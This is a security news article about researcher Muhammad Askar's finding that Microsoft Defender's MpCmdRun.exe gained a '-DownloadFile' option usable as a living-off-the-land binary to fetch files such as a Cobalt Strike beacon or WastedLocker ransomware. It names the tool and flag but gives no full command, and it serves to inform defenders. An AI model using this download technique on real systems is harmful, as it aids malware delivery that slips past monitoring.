Attackers can use Microsoft Defender to download viruses and malware
The latest update to Microsoft Defender Antivirus for Windows 10 allows using it to download viruses, malware, and other files to Windows computer.[dropcap]Security[/dropcap] researcher Muhammad Askar discovered this ability to download malware.
The Microsoft Defender Command Line Tool update now includes a new command line argument -DownloadFile. The directive allows a local user to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download a file from a remote location using a dedicated command.
“Well, you can download a file from the internet using Windows Defender itself. In this example, I was able to download Cobalt Strike beacon using the binary ‘MpCmdRun.exe’ which is the ‘Microsoft Malware Protection Command Line,” — Askar stated on Twitter.
This allows a local attacker to effectively use the Defender as a so-called “living-off-the-land binary” (LOLBin). This the case, when legitimate software is used for malicious manipulation – for example, to download a virus using an anti-virus program.
It looks like this new ability was added to Defender with the July update as 4.18.2007.8, so the functionality has been there for almost two months now.
Bleeping Computer experts tested the boot method found by Mohammed Askar and using a string to download the ransomware WastedLocker, which recently caused serious problems in Garmin’s infrastructure, prompting the company to reportedly pay a multi-million dollar ransom.
“The good news is that Microsoft Defender will detect malicious files downloaded with MpCmdRun.exe, but it is unknown if other AV software will allow this program to bypass their detections.”, – write Bleeping Computer specialists.
However, only a local user can initiate such download.
However, this adds a headache for network administrators – they now have an additional Windows executable file that they need to monitor so that it is not used against enterprise security.
As a reminder, last month the DisableAntiSpyware function in the registry was disabled in Microsoft Defender: the value assigned to it (0 – enabled, 1 – disabled) after installing the update will be ignored. Thus, the tech giant took away from users the ability to permanently disable the antivirus solution.
At the same time, Microsoft Defender behaves very strangely, if not to say impudently – we wrote that Microsoft Defender considered CCleaner to be a malicious application, then by considering the HOSTS file to be malicious if it blocks telemetry. It looks like Windows users got a real Pandora’s Box in their computers.